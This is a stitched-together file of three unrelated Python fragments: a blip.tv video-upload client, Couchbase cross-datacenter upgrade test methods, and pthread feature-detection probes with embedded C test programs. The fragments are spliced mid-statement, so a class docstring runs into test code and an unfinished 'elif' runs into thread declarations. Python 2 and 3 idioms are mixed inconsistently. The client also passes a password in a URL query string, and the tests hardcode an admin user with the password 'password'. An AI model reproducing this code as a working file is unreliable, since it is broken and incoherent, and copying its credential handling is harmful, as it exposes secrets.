def GetMimeType(self, filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def PostMultipart(self, url, fields, files=[]):
"""@brief Send multi-part HTTP POST request
@param url POST URL
@param fields A dict of {field-name: value}
@param files A list of [(field-name, filename)]
@return Status, reason, response (see httplib.HTTPConnection.getresponse())
"""
content_type = 'multipart/form-data; boundary=%s' % self.MULTIPART_BOUNDARY
# lots of code to figure out Content-Length.. and now I see:
# The header Content-Length is automatically set to the correct value.
# http://docs.python.org/library/httplib.html#httplib.HTTPConnection
# gather all the data (except for the actual file) into:
# fieldsdata - string of "field1:value1\nfield2:value2\n..."
# filedatas - list of tuples: [(metadata1, filename1),(m2,f2)...]
# footdata - string, final "\n--file delimiter--\n"
data = []
for field_name, value in fields.items():
data.append('--' + self.MULTIPART_BOUNDARY)
data.append( "Content-type: text/plain; charset=UTF-8" )
data.append('Content-Disposition: form-data; name="%s"' % field_name)
data.append('')
data.append(value.encode("utf-8"))
fieldsdata="\r\n".join(data)
filedatas=[]
for (field_name, filename) in files:
data=['']
data.append('--' + self.MULTIPART_BOUNDARY)
data.append(
'Content-Disposition: form-data; name="%s"; filename="%s"'
% (field_name, filename))
data.append('Content-Type: %s' % self.GetMimeType(filename))
data.append('')
data.append('')
filedatas.append(['\r\n'.join(data),filename])
footdata='\r\n--' + self.MULTIPART_BOUNDARY + '--\r\n'
# sum up the size of the 3 datas, including the file size
datalen = len(fieldsdata)
for filedata, filename in filedatas:
datalen += len(filedata)
datalen += os.stat(filename).st_size
datalen += len(footdata)
# open the connection, send the headers (not part of datas)
host, selector = urlparts = urllib.parse.urlsplit(url)[1:3]
h = http.client.HTTPConnection(host)
h.putrequest("POST", selector)
h.putheader("content-type", content_type)
h.putheader("content-length", datalen)
h.endheaders()
# send the datas
if self.debug: print(fieldsdata.__repr__())
if self.debug: print(fieldsdata)
self.start_time = datetime.datetime.now()
h.send(fieldsdata)
bytes_sent = len(fieldsdata)
for filedata, filename in filedatas:
if self.debug: print("%s (%s)" % (filedata.__repr__(), filename))
if self.debug: print("%s (%s)" % (filedata, filename))
h.send(filedata)
bytes_sent += len(filedata)
f = open(filename,'rb')
block_size=15000
block=f.read(block_size)
while block:
h.send(block)
bytes_sent += len(block)
self.progress(bytes_sent,datalen)
# time.sleep(.06)
block=f.read(block_size)
if self.debug: print(footdata.__repr__())
h.send(footdata)
bytes_sent += len(footdata)
self.progress(bytes_sent,datalen)
response = h.getresponse()
print("\n", response.status, response.reason)
return response
def Upload(self, video_id, username, password, files, meta={}, thumbname=None):
"""@brief Upload to blip.tv
@param video_id Either the item ID of an existing post or None to create
a new Episode.
@param username, password
@param files List of Filenames and Roles of videos to upload
@param meta['foo'] New foo of the post (title, description, etc)
@thumbname New thumbnail filename
@return Response data
"""
fields = {
"post": "1",
"skin": "xmlhttprequest",
"userlogin": username,
"password": password,
"item_type": "file",
}
if video_id: # update existing
fields["id"] = video_id
# add in additional metadata
fields.update(meta)
# extract out the file number and roles
# example:
# files = [ ('','Source','foo.ogg'), ('1','Web','foo.flv') ]
# fields['file_role']='Source'
# fields['file1_role']='Web'
# files= [ ('file','foo.ogg'), ('file1','foo.flv') ]
for no,role,filename in files:
fields["file%s" % no + "_role"] = role
files = [("file%s" % no, filename) for no,role,filename in files]
if thumbname:
files.append(("thumbnail",thumbname))
done=False
while not done:
try:
response = self.PostMultipart(self.BLIP_UPLOAD_URL, fields, files)
done=True
except socket.error as e:
print(e)
# and try again...
"""
r/lib/python2.6/httplib.py", line 759, in send
self.sock.sendall(str)
File "<string>", line 1, in sendall
socket.error: [Errno 104] Connection reset by peer
"""
            except http.client.BadStatusLine as e:
                print(e)
# and try again...
"""
File "/usr/lib/python2.6/httplib.py", line 391, in begin
version, status, reason = self._read_status()
File "/usr/lib/python2.6/httplib.py", line 355, in _read_status
raise BadStatusLine(line)
httplib.BadStatusLine
"""
return response
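    # Hypothetical usage sketch (credentials, filenames and metadata below are placeholders,
    # and it assumes a Blip instance `blip` has been constructed elsewhere):
    #
    #   files = [('', 'Source', 'talk.ogg'), ('1', 'Web', 'talk.flv')]
    #   response = blip.Upload(None, 'someuser', 'somepassword', files,
    #                          meta={'title': 'Example talk'}, thumbname='thumb.jpg')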
def Get_Licenses(self):
"""
        Get the list of licenses blip currently supports.
"""
url = 'http://www.blip.tv/?section=licenses&cmd=view&skin=api'
xml_code = urllib.request.urlopen(url).read()
return xml_code
def Get_Categories(self):
"""
        Get the list of categories blip currently supports.
"""
url = 'http://www.blip.tv/?section=categories&cmd=view&skin=api'
xml_code = urllib.request.urlopen(url).read()
return xml_code
def Get_VideoMeta(self, video_id):
"""@brief Return information about the video
@param video_id blip.tv item ID
@return xml of all the metadata.
"""
url = 'http://blip.tv/file/%s?skin=rss' % video_id
if self.debug: print(url)
xml_code = urllib.request.urlopen(url).read()
return xml_code
def Get_TextFromDomNode(self, node):
rc = ""
for n in node.childNodes:
if n.nodeType in [node.TEXT_NODE, node.CDATA_SECTION_NODE]:
rc += n.data
return rc
def Parse_VideoMeta(self, video_xml):
"""@brief Return information about the video
@param video_xml xml about an Episode from blip.tv
@return A dictionary with keys:
@a title (string),
@a description (string),
@a link (URL to video as a string),
@a embed_code (HTML <embed> code as a string),
@a embed_id (the part of the <embed> code that's used with the Drupal filter,
e.g., "AbCcKIuEBA"),
@a existing_mime_types (a dict of {mime_type: list_of_file_urls}
containing the URLs that are currently part of the post)
"""
meta={}
rss = xml.dom.minidom.parseString(video_xml)
channel = rss.getElementsByTagName("channel")[0]
item = channel.getElementsByTagName("item")[0]
meta['title'] = self.Get_TextFromDomNode(item.getElementsByTagName("title")[0])
meta['description'] = xml.sax.saxutils.unescape(
self.Get_TextFromDomNode(item.getElementsByTagName("blip:puredescription")[0]))
meta['link'] = self.Get_TextFromDomNode(item.getElementsByTagName("link")[0])
meta['posts_id'] = self.Get_TextFromDomNode(item.getElementsByTagName("blip:posts_id")[0])
meta['embed_code'] = self.Get_TextFromDomNode(item.getElementsByTagName("media:player")[0])
existing_mime_types = {}
contents = []
media_group = item.getElementsByTagName("media:group")[0]
for content in media_group.getElementsByTagName("media:content"):
existing_mime_types.setdefault(content.attributes["type"].value, []).append( content.attributes["url"].value)
contents.append({
'url': content.attributes["url"].value,
'type': content.attributes["type"].value,
'fileSize': content.attributes["fileSize"].value,
'isDefault': content.attributes["isDefault"].value,
'expression': content.attributes["expression"].value,
'role': content.attributes["blip:role"].value,
# 'acodec': content.attributes["blip:acodec"].value,
})
meta['existing_mime_types']=existing_mime_types
meta['contents']=contents
return meta
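    # Typical flow (sketch, with a placeholder item ID):
    #   xml_code = blip.Get_VideoMeta(1234567)
    #   meta = blip.Parse_VideoMeta(xml_code)
    #   print(meta['title'], meta['link'], list(meta['existing_mime_types']))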
def Get_MoreMeta(self, user_id, user_name, password, mystery_id):
# http://blip.tv/dashboard/episode_detailed/4840010?users_id=613931&userlogin=veyepar_test&password=<PASSWORD>&skin=json
url = "http://blip.tv/dashboard/episode_detailed/%(mystery_id)s?users_id=%(users_id)s&userlogin=%(user_name)s&password=%(password)s&skin=json" % { 'mystery_id':mystery_id,
'users_id':user_id, 'user_name':user_name, 'password':password }
if self.debug: print(url)
json_like_data = urllib.request.urlopen(url).read()
json_data = json_like_data[len('blip_ws_results('):-3]
return json_data
def Parse_MoreMeta(self, file_meta):
# [{"posts":[{"categoryId":"7"
# [u'conversions', u'languageCode', u'playlists', u'itemType', u'revenue', u'userId', u'blogUrl', u'licenseId', u'nsfw', u'licenseUrl', u'midrollStart', u'datestamp', u'thumbnailUrl', u'adsEnabled', u'display_name', u'additionalLicense', u'title', u'media', u'tags', u'contentRating', u'nextHiddenDate', u'midrollDuration', u'embedUrl', u'categoryId', u'description', u'views', u'thumbnail120Url', u'hidden', u'adminTitle', u'postsGuid', u'languageName', u'hiddenPassword', u'numMidrolls', u'itemId', u'datestampText', u'categoryName', u'mediaUrl', u'url', u'thumbnailFilename', u'licenseTitle', u'adOptOut', u'postsId', u'additionalMedia', u'login', u'embedLookup', u'showName']
j = json.loads(file_meta)
return j[0]
class Blip_CLI(Blip):
"""
Demonstates use of the Blip class as a Command Line Interface.
"""
self.dest_init])
prev_initial_version = self.initial_version
self.initial_version = self.upgrade_versions[0]
self._install(self.servers[self.src_init + self.dest_init:])
self.create_buckets()
self._join_all_clusters()
if float(prev_initial_version[:2]) < 3.0:
self.pause_xdcr_cluster = None
bucket_default = self.src_cluster.get_bucket_by_name('default')
bucket_sasl = self.src_cluster.get_bucket_by_name('sasl_bucket_1')
bucket_standard = self.dest_cluster.get_bucket_by_name('standard_bucket_1')
bucket_sasl_2 = self.dest_cluster.get_bucket_by_name('sasl_bucket_1')
gen_create2 = BlobGenerator('loadTwo', 'loadTwo-', self._value_size, end=self.num_items)
gen_delete2 = BlobGenerator('loadTwo', 'loadTwo-', self._value_size,
start=int((self.num_items) * (float)(100 - self._perc_del) / 100), end=self.num_items)
gen_update2 = BlobGenerator('loadTwo', 'loadTwo-', self._value_size, start=0,
end=int(self.num_items * (float)(self._perc_upd) / 100))
self._load_bucket(bucket_default, self.src_master, self.gen_create, 'create', exp=0)
self._load_bucket(bucket_sasl, self.src_master, self.gen_create, 'create', exp=0)
if self.pause_xdcr_cluster:
for cluster in self.get_cb_clusters():
for remote_cluster in cluster.get_remote_clusters():
remote_cluster.pause_all_replications()
self._online_upgrade(self.src_nodes, self.servers[self.src_init + self.dest_init:])
self.src_master = self.servers[self.src_init + self.dest_init]
if not self.is_goxdcr_migration_successful(self.src_master):
self.fail("C1: Metadata migration failed after old nodes were removed")
        if float(self.upgrade_versions[0][:3]) >= 5.0:
# Add built-in user to C1
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.src_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.src_master),
'builtin')
self._load_bucket(bucket_standard, self.dest_master, self.gen_create, 'create', exp=0)
self._load_bucket(bucket_default, self.src_master, self.gen_update, 'create', exp=self._expires)
self._load_bucket(bucket_sasl, self.src_master, self.gen_update, 'create', exp=self._expires)
self._install(self.src_nodes)
self._online_upgrade(self.servers[self.src_init + self.dest_init:], self.src_nodes, False)
self._load_bucket(bucket_sasl_2, self.dest_master, gen_create2, 'create', exp=0)
self.src_master = self.servers[0]
self.log.info("###### Upgrading C1: completed ######")
self._install(self.servers[self.src_init + self.dest_init:])
self.sleep(60)
self._online_upgrade(self.dest_nodes, self.servers[self.src_init + self.dest_init:])
self.dest_master = self.servers[self.src_init + self.dest_init]
if not self.is_goxdcr_migration_successful(self.dest_master):
self.fail("C2: Metadata migration failed after old nodes were removed")
self._install(self.dest_nodes)
self.sleep(60)
if float(self.initial_version[:2]) >= 3.0 and self._demand_encryption:
if not self.is_ssl_over_memcached(self.src_master):
self.log.info("C1: After old nodes were replaced, C1 still uses "
"proxy connection to C2 which is >= 3.0")
if not self.is_ssl_over_memcached(self.dest_master):
self.log.info("C2: After old nodes were replaced, C2 still uses "
"proxy connection to C1 which is >= 3.0")
self._online_upgrade(self.servers[self.src_init + self.dest_init:], self.dest_nodes, False)
self.dest_master = self.servers[self.src_init]
        if float(self.upgrade_versions[0][:3]) >= 5.0:
# Add built-in user to C2
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.dest_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.dest_master),
'builtin')
self.log.info("###### Upgrading C2: completed ######")
if self.pause_xdcr_cluster:
for cluster in self.get_cb_clusters():
for remote_cluster in cluster.get_remote_clusters():
remote_cluster.resume_all_replications()
self._load_bucket(bucket_default, self.src_master, self.gen_delete, 'delete', exp=0)
self._load_bucket(bucket_sasl, self.src_master, self.gen_delete, 'delete', exp=0)
self._load_bucket(bucket_standard, self.dest_master, self.gen_delete, 'delete', exp=0)
self._load_bucket(bucket_sasl_2, self.dest_master, gen_delete2, 'delete', exp=0)
self._wait_for_replication_to_catchup(timeout=600)
self._post_upgrade_ops()
self.sleep(120)
self.verify_results()
self.max_verify = None
if self.ddocs_src:
for bucket_name in self.buckets_on_src:
bucket = self.src_cluster.get_bucket_by_name(bucket_name)
expected_rows = sum([len(kv_store) for kv_store in bucket.kvs.values()])
self._verify_ddocs(expected_rows, [bucket_name], self.ddocs_src, self.src_master)
if self.ddocs_dest:
for bucket_name in self.buckets_on_dest:
bucket = self.dest_cluster.get_bucket_by_name(bucket_name)
expected_rows = sum([len(kv_store) for kv_store in bucket.kvs.values()])
self._verify_ddocs(expected_rows, [bucket_name], self.ddocs_dest, self.dest_master)
if float(self.upgrade_versions[0][:3]) == 4.6:
self.log.info("##### Testing LWW as we are upgrading to 4.6 #####")
src_conn = RestConnection(self.src_master)
dest_conn = RestConnection(self.dest_master)
src_conn.delete_bucket(bucket='default')
dest_conn.delete_bucket(bucket='default')
src_conn.create_bucket(bucket='lww', ramQuotaMB=100, authType='none', saslPassword='', replicaNumber=1,
proxyPort=STANDARD_BUCKET_PORT + 1, bucketType='membase', replica_index=1, threadsNumber=3,
flushEnabled=1, lww=True)
dest_conn.create_bucket(bucket='lww', ramQuotaMB=100, authType='none', saslPassword='', replicaNumber=1,
proxyPort=STANDARD_BUCKET_PORT + 1, bucketType='membase', replica_index=1, threadsNumber=3,
flushEnabled=1, lww=True)
self.assertTrue(src_conn.is_lww_enabled(bucket='lww'), "LWW not enabled on source bucket")
self.log.info("LWW enabled on source bucket as expected")
self.assertTrue(dest_conn.is_lww_enabled(bucket='lww'), "LWW not enabled on dest bucket")
self.log.info("LWW enabled on dest bucket as expected")
if float(self.initial_version[:3]) == 3.1 and float(self.upgrade_versions[0][:3]) == 4.1:
goxdcr_log = NodeHelper.get_goxdcr_log_dir(self._input.servers[0])\
+ '/goxdcr.log*'
for node in self.src_cluster.get_nodes():
count1 = NodeHelper.check_goxdcr_log(
node,
"Received error response from memcached in target cluster",
goxdcr_log)
count2 = NodeHelper.check_goxdcr_log(
node,
"EINVAL",
goxdcr_log)
count3 = NodeHelper.check_goxdcr_log(
node,
"Failed to repair connections to target cluster",
goxdcr_log)
count4 = NodeHelper.check_goxdcr_log(
node,
"received error response from setMeta client. Repairing connection. response status=EINVAL",
goxdcr_log)
count5 = NodeHelper.check_goxdcr_log(
node,
"GOGC in new global setting is 0, which is not a valid value and can only have come from "
"upgrade. Changed it to 100 instead.",
goxdcr_log)
if count1 > 0 or count2 > 0:
self.assertEqual(count3, 0, "Failed to repair connections to target cluster "
"error message found in " + str(node.ip))
self.log.info("Failed to repair connections to target cluster "
"error message not found as expected in " + str(node.ip))
self.assertEqual(count4, 0, "Disconnect errors found in " + str(node.ip))
self.assertEqual(count5, 0, "GOGC reset to 0 during upgrade in " + str(node.ip))
def incremental_offline_upgrade(self):
if self.bucket_type == "ephemeral" and float(self.initial_version[:3]) < 5.0:
self.log.info("Ephemeral buckets not available in version " + str(self.initial_version))
self.skip_this_version = True
return
if self.initial_version[:3] >= self.upgrade_versions[0][:3]:
self.log.info("Initial version greater than upgrade version - not supported")
self.skip_this_version = True
return
upgrade_seq = self.input.param("upgrade_seq", "src>dest")
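        # upgrade_seq controls the order in which the two clusters are upgraded below:
        #   "src>dest"  - upgrade all source nodes first, then all destination nodes
        #   "src<dest"  - upgrade all destination nodes first, then all source nodes
        #   "src><dest" - alternate one source node and one destination node at a time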
self._install(self.servers[:self.src_init + self.dest_init ])
self.create_buckets()
self._join_all_clusters()
self.sleep(60)
bucket = self.src_cluster.get_bucket_by_name('default')
self._load_bucket(bucket, self.src_master, self.gen_create, 'create', exp=0)
bucket = self.src_cluster.get_bucket_by_name('sasl_bucket_1')
self._load_bucket(bucket, self.src_master, self.gen_create, 'create', exp=0)
bucket = self.dest_cluster.get_bucket_by_name('sasl_bucket_1')
gen_create2 = BlobGenerator('loadTwo', 'loadTwo', self._value_size, end=self.num_items)
self._load_bucket(bucket, self.dest_master, gen_create2, 'create', exp=0)
self.sleep(self.wait_timeout)
self._wait_for_replication_to_catchup()
nodes_to_upgrade = []
if upgrade_seq == "src>dest":
nodes_to_upgrade = copy.copy(self.src_nodes)
nodes_to_upgrade.extend(self.dest_nodes)
elif upgrade_seq == "src<dest":
nodes_to_upgrade = copy.copy(self.dest_nodes)
nodes_to_upgrade.extend(self.src_nodes)
elif upgrade_seq == "src><dest":
min_cluster = min(len(self.src_nodes), len(self.dest_nodes))
for i in xrange(min_cluster):
nodes_to_upgrade.append(self.src_nodes[i])
nodes_to_upgrade.append(self.dest_nodes[i])
for _seq, node in enumerate(nodes_to_upgrade):
self._offline_upgrade([node])
self.sleep(60)
            if float(self.upgrade_versions[0][:3]) >= 5.0:
# Add built-in user to C1
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.src_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.src_master),
'builtin')
# Add built-in user to C2
testuser = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'password': 'password'}]
RbacBase().create_user_source(testuser, 'builtin',
self.dest_master)
# Assign user to role
role_list = [{'id': 'cbadminbucket', 'name': 'cbadminbucket', 'roles': 'admin'}]
RbacBase().add_user_role(role_list,
RestConnection(self.dest_master),
'builtin')
bucket = self.src_cluster.get_bucket_by_name('sasl_bucket_1')
itemPrefix = "loadThree" + _seq * 'a'
gen_create3 = BlobGenerator(itemPrefix, itemPrefix, self._value_size, end=self.num_items)
self._load_bucket(bucket, self.src_master, gen_create3, 'create', exp=0)
bucket = self.src_cluster.get_bucket_by_name('default')
itemPrefix = "loadFour" + _seq * 'a'
gen_create4 = BlobGenerator(itemPrefix, itemPrefix, self._value_size, end=self.num_items)
self._load_bucket(bucket, self.src_master, gen_create4, 'create', exp=0)
self._wait_for_replication_to_catchup(timeout=600)
self.merge_all_buckets()
self.verify_results()
self.sleep(self.wait_timeout * 5, "Let clusters work for some time")
if float(self.initial_version[:3]) == 3.1 and float(self.upgrade_versions[0][:3]) == 4.1:
goxdcr_log = NodeHelper.get_goxdcr_log_dir(self._input.servers[0])\
+ '/goxdcr.log*'
for node in self.src_cluster.get_nodes():
count1 = NodeHelper.check_goxdcr_log(
node,
"Received error response from memcached in target cluster",
goxdcr_log)
count2 = NodeHelper.check_goxdcr_log(
node,
"EINVAL",
goxdcr_log)
count3 = NodeHelper.check_goxdcr_log(
node,
"Failed to repair connections to target cluster",
goxdcr_log)
count4 = NodeHelper.check_goxdcr_log(
node,
"received error response from setMeta client. Repairing connection. response status=EINVAL",
goxdcr_log)
count5 = NodeHelper.check_goxdcr_log(
node,
"GOGC in new global setting is 0, which is not a valid value and can only have come from "
"upgrade. Changed it to 100 instead.",
goxdcr_log)
if count1 > 0 or count2 > 0:
self.assertEqual(count3, 0, "Failed to repair connections to target cluster "
"error message found in " + str(node.ip))
self.log.info("Failed to repair connections to target cluster "
"error message not found as expected in " + str(node.ip))
self.assertEqual(count4, 0, "Disconnect errors found in " + str(node.ip))
self.assertEqual(count5, 0, "GOGC reset to 0 during upgrade in " + str(node.ip))
def _operations(self):
# TODO: there are not tests with views
if self.ddocs_num_src:
ddocs = self._create_views(self.ddocs_num_src, self.buckets_on_src,
self.views_num_src, self.src_master)
self.ddocs_src.extend(ddocs)
if self.ddocs_num_dest:
ddocs = self._create_views(self.ddocs_num_dest, self.buckets_on_dest,
self.views_num_dest, self.dest_master)
self.ddocs_dest.extend(ddocs)
def _verify(self, expected_rows):
if self.ddocs_src:
self._verify_ddocs(expected_rows, self.buckets_on_src, self.ddocs_src, self.src_master)
if self.ddocs_dest:
self._verify_ddocs(expected_rows, self.buckets_on_dest, self.ddocs_dest, self.dest_master)
def _create_views(self, ddocs_num, buckets, views_num, server):
ddocs = []
if ddocs_num:
self.default_view = View(self.default_view_name, None, None)
for bucket in buckets:
for i in xrange(ddocs_num):
views = self.make_default_views(self.default_view_name, views_num,
self.is_dev_ddoc, different_map=True)
ddoc = DesignDocument(self.default_view_name + str(i), views)
bucket_server = self._get_bucket(bucket, server)
tasks = self.async_create_views(server, ddoc.name, views, bucket=bucket_server)
for task in tasks:
task.result(timeout=90)
ddocs.append(ddoc)
return ddocs
def _verify_ddocs(self, expected_rows, buckets, ddocs, server):
query = {"connectionTimeout" : 60000}
if self.max_verify:
expected_rows = self.max_verify
query["limit"] = expected_rows
for bucket in buckets:
for ddoc in ddocs:
prefix = ("", "dev_")[ddoc.views[0].dev_view]
bucket_server = self._get_bucket(bucket, server)
self.perform_verify_queries(len(ddoc.views), prefix, ddoc.name, query, bucket=bucket_server,
wait_time=self.wait_timeout * 5, expected_rows=expected_rows,
retry_time=10, server=server)
def _post_upgrade_ops(self):
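        # post_upgrade_ops is a ';'-separated list of "<cluster>-<op>" tokens, where
        # <cluster> is 'src' or 'dest' and <op> is 'rebalancein' or 'rebalanceout'
        # (e.g. "src-rebalancein;dest-rebalanceout" - an illustrative value, not a default).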
if self.post_upgrade_ops:
for op_cluster in self.post_upgrade_ops.split(';'):
cluster, op = op_cluster.split('-')
if op == 'rebalancein':
free_servs= copy.copy(self.servers)
for ser in self.servers:
for used in self.src_nodes+self.dest_nodes:
if ser.ip == used.ip:
free_servs.remove(ser)
break
servers_to_add = free_servs[:self.nodes_in]
if servers_to_add:
temp = self.initial_version
self.initial_version = self.upgrade_versions[0]
self._install(servers_to_add)
self.initial_version = temp
if cluster == 'src':
self.cluster.rebalance(self.src_nodes, servers_to_add, [])
self.src_nodes.extend(servers_to_add)
elif cluster == 'dest':
try:
self.cluster.rebalance(self.dest_nodes, servers_to_add, [])
self.dest_nodes.extend(servers_to_add)
except RebalanceFailedException:
if self._check_del_compatibility:
for node in servers_to_add:
err, numerr = NodeHelper.check_goxdcr_log(node,"Invalid format specified for DCP_DELETION",\
log_name="memcached.log",print_matches=True)
if numerr >= 1:
self.fail("MB-31141 has been hit!")
else:
self.fail("Rebalance failed")
elif op == 'rebalanceout':
if cluster == 'src':
self.src_master = self.servers[0]
rebalance_out_candidates = filter(lambda node: node.ip != self.src_master.ip, self.src_nodes)
self.cluster.rebalance(self.src_nodes, [], rebalance_out_candidates[:self.nodes_out])
for node in rebalance_out_candidates[:self.nodes_out]:
self.src_nodes.remove(node)
                    elif cluster
    pthread_attr_getschedparam = c.function_test('int', 'const pthread_attr_t*', 'struct sched_param*')
pthread_attr_getschedpolicy = c.function_test('int', 'const pthread_attr_t*', 'int*')
pthread_attr_getscope = c.function_test('int', 'const pthread_attr_t*', 'int*')
pthread_attr_getstack = c.function_test('int', 'const pthread_attr_t*', 'void**', 'size_t*')
pthread_attr_getstackaddr = c.function_test('int', 'const pthread_attr_t*', 'void**')
pthread_attr_getstacksize = c.function_test('int', 'const pthread_attr_t*', 'size_t*')
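    # Note on the @property accessors in this class: functions whose availability is
    # implied by a base test (pthread_create, pthread_cond_init, pthread_mutex_init,
    # pthread_rwlock_init, pthread_spin_init, ...) are not probed independently; they
    # simply report a c.Function signature when the corresponding *_init/create test passes.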
@property
def pthread_attr_init(self):
if self.pthread_create:
return c.Function('int', 'pthread_attr_t*')
@property
def pthread_attr_setdetachstate(self):
if self.pthread_create:
return c.Function('int', 'pthread_attr_t*', 'int')
pthread_attr_setguardsize = c.function_test('int', 'pthread_attr_t*', 'size_t')
pthread_attr_setinheritsched = c.function_test('int', 'pthread_attr_t*', 'int')
pthread_attr_setschedparam = c.function_test('int', 'pthread_attr_t*', 'const struct sched_param*')
pthread_attr_setschedpolicy = c.function_test('int', 'pthread_attr_t*', 'int')
pthread_attr_setscope = c.function_test('int', 'pthread_attr_t*', 'int')
pthread_attr_setstack = c.function_test('int', 'pthread_attr_t*', 'void*', 'size_t')
pthread_attr_setstackaddr = c.function_test('int', 'pthread_attr_t*', 'void*')
pthread_attr_setstacksize = c.function_test('int', 'pthread_attr_t*', 'size_t')
@property
def pthread_barrier_destroy(self):
if self.pthread_barrier_init:
return c.Function('int', 'pthread_barrier_t*')
pthread_barrier_init = c.function_test('int', 'pthread_barrier_t*', 'const pthread_barrierattr_t*', 'unsigned', test='''
#include <pthread.h>
int main() {
pthread_barrier_t barrier;
if (pthread_barrier_init(&barrier, 0, 1) != 0) return 1;
if (pthread_barrier_wait(&barrier) != PTHREAD_BARRIER_SERIAL_THREAD) return 1;
if (pthread_barrier_destroy(&barrier) != 0) return 1;
return 0;
}
''')
@property
def pthread_barrier_wait(self):
if self.pthread_barrier_init:
return c.Function('int', 'pthread_barrier_t*')
pthread_barrierattr_destroy = c.function_test('int', 'pthread_barrierattr_t*')
pthread_barrierattr_getpshared = c.function_test('int', 'const pthread_barrierattr_t*', 'int*')
pthread_barrierattr_init = c.function_test('int', 'pthread_barrierattr_t*')
pthread_barrierattr_setpshared = c.function_test('int', 'pthread_barrierattr_t*', 'int')
pthread_cancel = c.function_test('int', 'pthread_t')
pthread_cleanup_push = c.function_test('void', 'void (*)(void*)', 'void*')
pthread_cleanup_pop = c.function_test('void', 'int')
@property
def pthread_cond_broadcast(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*')
@property
def pthread_cond_destroy(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*')
pthread_cond_init = c.function_test('int', 'pthread_cond_t*', 'const pthread_condattr_t*', test='''
#include <pthread.h>
int main() {
pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_lock(&mutex) != 0) return 1;
if (pthread_cond_init(&cond, 0) != 0) return 1;
if (pthread_cond_broadcast(&cond) != 0) return 1;
if (pthread_cond_signal(&cond) != 0) return 1;
if (pthread_cond_timedwait(&cond, &mutex, &t) != 0) return 1;
if (pthread_cond_wait(&cond, &mutex) != 0) return 1;
if (pthread_cond_destroy(&cond) != 0) return 1;
return 0;
}
''')
@property
def pthread_cond_signal(self):
if self.pthread_cond_init:
return c.Function ('int', 'pthread_cond_t*')
@property
def pthread_cond_timedwait(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*', 'pthread_mutex_t*', 'const struct timespec*')
@property
def pthread_cond_wait(self):
if self.pthread_cond_init:
return c.Function('int', 'pthread_cond_t*', 'pthread_mutex_t*')
pthread_condattr_destroy = c.function_test('int', 'pthread_condattr_t*')
pthread_condattr_getclock = c.function_test('int', 'const pthread_condattr_t*', 'clockid_t*')
pthread_condattr_getpshared = c.function_test('int', 'const pthread_condattr_t*', 'int*')
pthread_condattr_init = c.function_test('int', 'pthread_condattr_t*')
pthread_condattr_setclock = c.function_test('int', 'pthread_condattr_t*', 'clockid_t')
pthread_condattr_setpshared = c.function_test('int', 'pthread_condattr_t*', 'int')
pthread_create = c.function_test('int', 'pthread_t*', 'const pthread_attr_t*', 'void* (*)(void*)', 'void*', test='''
#include <pthread.h>
void* start(void* data) { return NULL; }
int main(int argc, char** argv) {
pthread_t thr;
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED);
int res = pthread_create(&thr, &attr, start, NULL);
pthread_attr_destroy(&attr);
return res;
}
''')
pthread_detach = c.function_test('int', 'pthread_t')
pthread_equal = c.function_test('int', 'pthread_t', 'pthread_t')
pthread_exit = c.function_test('void', 'void*')
pthread_getconcurrency = c.function_test('int', 'void')
pthread_getcpuclockid = c.function_test('int', 'pthread_t', 'clockid_t*')
pthread_getschedparam = c.function_test('int', 'pthread_t', 'int*', 'struct sched_param*')
pthread_getspecific = c.function_test('void*', 'pthread_key_t')
pthread_join = c.function_test('int', 'pthread_t', 'void**')
pthread_key_create = c.function_test('int', 'pthread_key_t*', 'void (*)(void*)')
pthread_key_delete = c.function_test('int', 'pthread_key_t')
@property
def pthread_mutex_destroy(self):
if self.pthread_mutex_init:
return c.Function('int', 'pthread_mutex_t*')
pthread_mutex_getprioceiling = c.function_test('int', 'const pthread_mutex_t*', 'int*')
pthread_mutex_init = c.function_test('int', 'pthread_mutex_t*', 'const pthread_mutexattr_t*', test='''
#include <pthread.h>
int main() {
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_lock(&mutex) != 0) return 1;
if (pthread_mutex_unlock(&mutex) != 0) return 1;
if (pthread_mutex_destroy(&mutex) != 0) return 1;
return 0;
}
''')
    @property
    def pthread_mutex_lock(self):
if self.pthread_mutex_init:
return c.Function('int', 'pthread_mutex_t*')
pthread_mutex_setprioceiling = c.function_test('int', 'pthread_mutex_t*', 'int', 'int*')
pthread_mutex_timedlock = c.function_test('int', 'pthread_mutex_t*', 'const struct timespec*', test='''
#include <pthread.h>
int main() {
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
struct timespec t = { 0, 0 };
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_timedlock(&mutex, &t) != 0) return 1;
if (pthread_mutex_unlock(&mutex) != 0) return 1;
if (pthread_mutex_destroy(&mutex) != 0) return 1;
return 0;
}
''')
pthread_mutex_trylock = c.function_test('int', 'pthread_mutex_t*', test='''
#include <pthread.h>
int main() {
pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
if (pthread_mutex_init(&mutex, 0) != 0) return 1;
if (pthread_mutex_trylock(&mutex) != 0) return 1;
